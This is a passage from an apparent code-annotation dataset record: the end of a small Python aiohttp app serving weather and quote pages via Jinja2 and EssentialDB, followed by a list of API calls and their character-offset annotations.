quote = random.choice(db.get("quotes"))
return { 'quote': quote }
if __name__ == "__main__":
with open('mm_config.json') as json_data_file:
mm_config = json.load(json_data_file)
weather_connector = WeatherConnector(mm_config["weather"]["url"])
db_file_path = mm_config["server"]["db_file"]
handler = MMRequestHandler(db_file_path)
app = web.Application()
app.router.add_get('/weather', handler.weather)
app.router.add_get('/quote', handler.quote)
app.router.add_static('/static', "static")
aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader('templates'))
web.run_app(app)
| [
"aiohttp.web.run_app",
"weather_connector.WeatherConnector",
"aiohttp.web.Application",
"json.load",
"os.path.isfile",
"datetime.datetime.now",
"essentialdb.EssentialDB",
"aiohttp_jinja2.template",
"jinja2.FileSystemLoader",
"datetime.timedelta"
] | [((616, 655), 'aiohttp_jinja2.template', 'aiohttp_jinja2.template', (['"""weather.html"""'], {}), "('weather.html')\n", (639, 655), False, 'import aiohttp_jinja2\n'), ((1399, 1436), 'aiohttp_jinja2.template', 'aiohttp_jinja2.template', (['"""quote.html"""'], {}), "('quote.html')\n", (1422, 1436), False, 'import aiohttp_jinja2\n'), ((1766, 1811), 'weather_connector.WeatherConnector', 'WeatherConnector', (["mm_config['weather']['url']"], {}), "(mm_config['weather']['url'])\n", (1782, 1811), False, 'from weather_connector import WeatherConnector\n'), ((1919, 1936), 'aiohttp.web.Application', 'web.Application', ([], {}), '()\n', (1934, 1936), False, 'from aiohttp import web\n'), ((2164, 2180), 'aiohttp.web.run_app', 'web.run_app', (['app'], {}), '(app)\n', (2175, 2180), False, 'from aiohttp import web\n'), ((1715, 1740), 'json.load', 'json.load', (['json_data_file'], {}), '(json_data_file)\n', (1724, 1740), False, 'import json\n'), ((388, 416), 'os.path.isfile', 'os.path.isfile', (['self.db_path'], {}), '(self.db_path)\n', (402, 416), False, 'import os\n'), ((707, 741), 'essentialdb.EssentialDB', 'EssentialDB', ([], {'filepath': 'self.db_path'}), '(filepath=self.db_path)\n', (718, 741), False, 'from essentialdb import EssentialDB\n'), ((1486, 1520), 'essentialdb.EssentialDB', 'EssentialDB', ([], {'filepath': 'self.db_path'}), '(filepath=self.db_path)\n', (1497, 1520), False, 'from essentialdb import EssentialDB\n'), ((2122, 2158), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (['"""templates"""'], {}), "('templates')\n", (2145, 2158), False, 'import jinja2\n'), ((518, 552), 'essentialdb.EssentialDB', 'EssentialDB', ([], {'filepath': 'self.db_path'}), '(filepath=self.db_path)\n', (529, 552), False, 'from essentialdb import EssentialDB\n'), ((861, 884), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (882, 884), False, 'import datetime\n'), ((933, 999), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': "mm_config['weather']['update_minutes']"}), "(minutes=mm_config['weather']['update_minutes'])\n", (951, 999), False, 'import datetime\n')] |